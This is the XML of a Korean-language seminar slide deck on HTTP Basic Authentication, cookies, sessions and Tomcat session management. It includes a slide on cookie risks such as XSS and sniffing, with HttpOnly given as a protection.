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2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="270" r:id="rId3"/>
    <p:sldId id="267" r:id="rId4"/>
    <p:sldId id="268" r:id="rId5"/>
    <p:sldId id="269" r:id="rId6"/>
    <p:sldId id="262" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="275" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="276" r:id="rId11"/>
    <p:sldId id="272" r:id="rId12"/>
    <p:sldId id="277" r:id="rId13"/>
    <p:sldId id="278" r:id="rId14"/>
    <p:sldId id="264" r:id="rId15"/>
    <p:sldId id="273" r:id="rId16"/>
    <p:sldId id="281" r:id="rId17"/>
    <p:sldId id="290" r:id="rId18"/>
    <p:sldId id="265" r:id="rId19"/>
    <p:sldId id="274" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="283" r:id="rId22"/>
    <p:sldId id="284" r:id="rId23"/>
    <p:sldId id="291" r:id="rId24"/>
    <p:sldId id="285" r:id="rId25"/>
    <p:sldId id="286" r:id="rId26"/>
    <p:sldId id="289" r:id="rId27"/>
    <p:sldId id="287" r:id="rId28"/>
    <p:sldId id="288" r:id="rId29"/>
    <p:sldId id="279" r:id="rId30"/>
    <p:sldId id="261" r:id="rId31"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="D2Coding" panose="020B0609020101020101" pitchFamily="49" charset="-127"/>
      <p:regular r:id="rId33"/>
      <p:bold r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Pretendard GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Pretendard GOV Black" panose="02000A03000000020004" pitchFamily="2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489EEB75-A759-4C80-8BA9-D83DAD74EBC5}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="270"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="도입" id="{B50EA925-6B77-4FB0-B5E6-22EC13E0511D}">
          <p14:sldIdLst>
            <p14:sldId id="267"/>
            <p14:sldId id="268"/>
            <p14:sldId id="269"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="HTTP Basic Authentication" id="{CE81D103-C103-430C-A233-F7CFDA010F87}">
          <p14:sldIdLst>
            <p14:sldId id="262"/>
            <p14:sldId id="271"/>
            <p14:sldId id="275"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Cookie" id="{7A2CF710-B193-440A-8433-21AA87B2C680}">
          <p14:sldIdLst>
            <p14:sldId id="263"/>
            <p14:sldId id="276"/>
            <p14:sldId id="272"/>
            <p14:sldId id="277"/>
            <p14:sldId id="278"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Session" id="{38FD5C28-02EB-4C8C-8A40-CE5F5BFFD3BD}">
          <p14:sldIdLst>
            <p14:sldId id="264"/>
            <p14:sldId id="273"/>
            <p14:sldId id="281"/>
            <p14:sldId id="290"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Tomcat에서 세션 관리" id="{8E2F8897-1A9F-4824-BFB7-EE58F5729EF0}">
          <p14:sldIdLst>
            <p14:sldId id="265"/>
            <p14:sldId id="274"/>
            <p14:sldId id="282"/>
            <p14:sldId id="283"/>
            <p14:sldId id="284"/>
            <p14:sldId id="291"/>
            <p14:sldId id="285"/>
            <p14:sldId id="286"/>
            <p14:sldId id="289"/>
            <p14:sldId id="287"/>
            <p14:sldId id="288"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="마침" id="{7C59EF8F-FA75-470E-99B8-99D0907698A4}">
          <p14:sldIdLst>
            <p14:sldId id="27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3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96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7" d="100"/>
          <a:sy n="107" d="100"/>
        </p:scale>
        <p:origin x="3715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fld id="{062910CB-440F-405B-AA1A-8F3FF2B23AA5}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2025-01-23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fld id="{55108DEB-FEC8-41F5-B5C2-B4D1259EF05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56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 GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
        <a:ea typeface="Pretendard GOV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 GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
        <a:ea typeface="Pretendard GOV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 GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
        <a:ea typeface="Pretendard GOV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 GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
        <a:ea typeface="Pretendard GOV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 GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
        <a:ea typeface="Pretendard GOV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08DEB-FEC8-41F5-B5C2-B4D1259EF05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445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tulus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park@duck.com" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.instagram.com/yeonjong.park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933930A-F3D8-E5DC-0D8F-EDC69CE64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5" b="32176"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038601" y="1"/>
            <a:ext cx="8153400" cy="68579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E0F06C-1DA1-A022-0258-60A712D4BE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038599" y="1"/>
            <a:ext cx="2743199" cy="685799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3000">
                <a:schemeClr val="tx1">
                  <a:alpha val="30000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90905">
                <a:srgbClr val="000000">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="83000">
                <a:schemeClr val="tx1">
                  <a:alpha val="5000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8171E2-848E-6FA3-40F6-26DC8B3D1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91" y="1921397"/>
            <a:ext cx="11467617" cy="756958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C2A3E-D65C-B0C8-6106-BEE1247F4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191" y="2861590"/>
            <a:ext cx="11467616" cy="5674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6E695-6E79-6D65-F5E9-C278A6A8B621}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362191" y="4845921"/>
            <a:ext cx="1156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rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" dirty="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rPr>
              <a:t>SEMINAR</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Pretendard GOV Black" panose="02000A03000000020004" pitchFamily="2" charset="-127"/>
              <a:ea typeface="Pretendard GOV Black" panose="02000A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08818-8BE7-F636-CF18-FC5B6B2309F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362192" y="3769574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GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
                <a:ea typeface="Pretendard GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>20210463 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Pretendard GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
                <a:ea typeface="Pretendard GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>박연종</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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1EDD9A-85D0-D4D9-569F-6867EDF48787}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362191" y="4138906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rPr>
              <a:t>park@duck.com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1AB99-2A04-4BF0-81AA-279D2275E264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362191" y="6533922"/>
            <a:ext cx="11272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rPr>
              <a:t>Photo by Pawel Czerwinski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34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E5FA6-776C-D9D7-F99B-A3DC8EBC0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dirty="0"/>
              <a:t>00.</a:t>
            </a:r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A9FED-E497-7E94-39E0-BDAB730AF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36757"/>
            <a:ext cx="10515600" cy="135289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D5A59-199E-2530-798B-211AC416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F81B-DA94-470D-9F74-85B04275702D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0A337-977F-596C-4B5C-4A56C2D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E12DE-D4F2-5C48-1400-7D4E5E87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2C35-950A-4CF0-9365-8DF39B6EB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63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57821D2-03B4-48B4-B634-54E1C94C4319}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"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BA550E-94C8-DB5C-98BE-8F166440D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F81B-DA94-470D-9F74-85B04275702D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8F1D9A-62B4-3E86-F906-F2D0BEA1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2DF009-D7AC-4D03-3913-79D5BD7A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C2C35-950A-4CF0-9365-8DF39B6EBE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0FD5203-F68C-50C4-1D60-A843CEDC3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689" y="123746"/>
            <a:ext cx="11467617" cy="541219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CF0629-2AED-AAD4-CBA0-BF79D2BFC8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180" b="19067"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10912850" y="74651"/>
            <a:ext cx="987461" cy="63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1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침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07EE94E-0BE9-BC3D-4953-AB985D01B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5" b="32176"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038601" y="1"/>
            <a:ext cx="8153400" cy="68579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3A12E1-1646-CE49-356E-A5E35BD0201A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038599" y="1"/>
            <a:ext cx="2743199" cy="685799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3000">
                <a:schemeClr val="tx1">
                  <a:alpha val="30000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="90905">
                <a:srgbClr val="000000">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="83000">
                <a:schemeClr val="tx1">
                  <a:alpha val="5000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864709-7AE1-E2E2-1D9D-2A14F77588E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362191" y="6533922"/>
            <a:ext cx="11272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rPr>
              <a:t>Photo by Pawel Czerwinski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DD7D74-BD4A-C6BD-CFAB-8DD99B71AD61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="362191" y="2020889"/>
            <a:ext cx="26212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Pretendard GOV Black" panose="02000A03000000020004" pitchFamily="2" charset="-127"/>
                <a:ea typeface="Pretendard GOV Black" panose="02000A03000000020004" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>감사합니다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3089C1-5A60-4A4B-5F5E-5101CF0A7E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="331075" y="4070929"/>
            <a:ext cx="3610304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rPr>
              <a:t>Email      /    park@duck.com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rPr>
              <a:t>Insta       /    @yeonjong.park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rPr>
              <a:t>GitHub   /    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  <a:cs typeface="Pretendard GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
              </a:rPr>
              <a:t>patulus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Pretendard GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
              <a:ea typeface="Pretendard GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
              <a:cs typeface="Pretendard GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="직사각형 23">
            <a:hlinkClick r:id="rId3"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADFC217F-AF57-943C-575E-33A80B269450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1114719" y="4659079"/>
            <a:ext cx="509130" cy="208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25" name="직사각형 24">
            <a:hlinkClick r:id="rId4"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F726C314-B4BC-D86A-3E49-403B3DC33349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126914" y="4402320"/>
            <a:ext cx="1056609" cy="229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26" name="직사각형 25">
            <a:hlinkClick r:id="rId5"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA87151A-64BB-15FA-DE7F-1A190EF9F0A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1126914" y="4161704"/>
            <a:ext cx="1056609" cy="212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75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8B53A-1707-F466-8D24-BCC71619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A8CDDE-58DC-F95F-EE01-E4EBEE146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41C13-8421-A078-9C53-47387BCFF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fld id="{3865F81B-DA94-470D-9F74-85B04275702D}" type="datetimeFigureOut">
              <a:rPr lang="ko-KR" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2025-01-23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B4AD77-6639-160F-8D95-E6045BFF6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9BC9C-C54B-9221-2C98-A5D10D58F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 GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
                <a:ea typeface="Pretendard GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3EEC2C35-950A-4CF0-9365-8DF39B6EBE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41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GOV Black" panose="02000A03000000020004" pitchFamily="2" charset="-127"/>
          <a:ea typeface="Pretendard GOV Black" panose="02000A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GOV" panose="02000503000000020004" pitchFamily="2" charset="-127"/>
          <a:ea typeface="Pretendard GOV" panose="020005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yeonjong.park" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/patulu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ark@duck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5E501-D443-6DFA-84C5-7B5D15C8A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  <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>쿠키와 세션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74546F-3783-097F-DE9D-E74C9D86D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25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F56962-ACE6-064B-F60F-A3B1F2AD89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쿠키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0F06F-0355-454F-F2EF-9EF0245A4E38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514272" y="1347537"/>
            <a:ext cx="6167073" cy="17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브라우저가 특정 도메인에 요청을 보낼 때 함께 전송하는 데이터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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>도메인에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>도메인의 쿠키를 생성할 수 없음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브라우저 단위로 관리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만료 시까지 상태 정보 유지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BF4E7-4B9A-404D-BBB8-6451B4D92C24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="343470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쿠키를 사용하는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1FE51-D005-529F-9918-76C666EB4444}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514271" y="3804034"/>
            <a:ext cx="6527749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HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Stateless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를 지향하므로 상태가 저장되지 않는 점을 보완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장바구니</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>로그인 유지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>다크</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 모드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>일 간 보지 않기 팝업 등에 쓰임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AA022F-C63F-EDA9-7C3C-2ACBB631581C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5608320" y="4679465"/>
            <a:ext cx="6069409" cy="1167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과거에는 브라우저가 데이터를 저장하는 방법이 쿠키로 유일했으나 현재는 웹 스토리지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sessionStorage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localStorage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가 존재해 서버로 전송할 필요가 없는 데이터는 이 곳에 저장해야 성능 저하를 막을 수 있음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7C2F01-0F83-E44B-6654-01BD2DF31537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1798721"/>
            <a:ext cx="5119437" cy="347111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FB149E-5FB0-B5D4-B282-F3FA7915543B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9801719" y="4217799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/>
              <a:t>파이어폭스 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>2006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>년부터 지원</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>크롬 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0"/>
              <a:t>2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>년부터 지원</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149116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8A397-7C35-F1DF-D12C-CEE8B2404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2EBA0FD-4F28-7BEC-919A-2523F8A2F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쿠키의 생성과 저장 과정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C1D0CB-247B-0474-3C44-9FDD11C05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49" y="1300707"/>
            <a:ext cx="1618297" cy="235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279C02F-6E4B-89C5-36A8-107B8BB9A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02" y="1300707"/>
            <a:ext cx="2491698" cy="294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10327A2-559F-302C-58AD-B5DBB17A609F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="2069279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BAA60E-2040-CB8D-D151-A294329CFDD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="162306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GET /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D468AAE-6062-885A-B585-14B55BC11B99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2773730" y="3311079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069A31-65BF-A8EC-4183-2742D717A600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="2286849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200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty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OK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Set-Cookie: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쿠키 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쿠키 값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Set-Cookie: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쿠키 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쿠키 값</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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183D512-FD63-9DAE-29BF-0AF379AE0E08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773732" y="4255762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559335-35B0-C4ED-CCCB-49867A7BA1E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773731" y="3551952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GET /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Cookie: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쿠키 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쿠키 값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쿠키 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쿠키 값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1B6AFF-4F46-5ED1-287C-21A44322C318}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5651651" y="2170122"/>
            <a:ext cx="5654040" cy="434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여러 개의 쿠키가 있으면 여러 개의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set-Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>헤더가 존재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0C62307-60B8-5334-BECC-1CF7150D69CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2726764" y="4959367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A39070-9477-E047-436E-1B277E58CABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2773730" y="45325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200 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty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D655E-D3AA-0EBA-200A-1664F78BC49C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695549" y="53726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쿠키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BD8B7-9B4E-778D-9B10-7B3E39ECEDB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695549" y="5821448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name=value; expires=[Date]; domain=[Domain]; path=[Path]; [Secure]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4C321-5BB2-2A32-C05C-A912126F8E73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695549" y="6237952"/>
            <a:ext cx="941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id=a3fWa; expires=Wed, 21 Oct 2015 07:28:00 GMT;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SameSite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=Lax; Secure;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HttpOnly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1C7A61-A3F7-AEE5-4D98-A57A65AD270E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6290586" y="5178233"/>
            <a:ext cx="5654040" cy="632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</a:rPr>
              <a:t>expires</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>max-age</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 선언하지 않으면 브라우저 종료 시에 쿠키가 없어짐</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283295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9F381-1879-3690-60CA-C37ED768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쿠키 문제점과 예방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2F64D-F7A9-CE5F-11F0-AB9064EF3733}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="1287379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사이트 간 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>스크립팅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>(XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t> 공격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44956-F043-2BC8-F287-67F2B49E6204}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291689" y="1738562"/>
            <a:ext cx="7231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JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가 접근할 수 없도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1"/>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>를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0D6C8-3F4B-ABC6-F100-1D43B90B7A0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="291690" y="309695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스니핑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64316-086B-E6D8-FF29-30FE17AE5BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
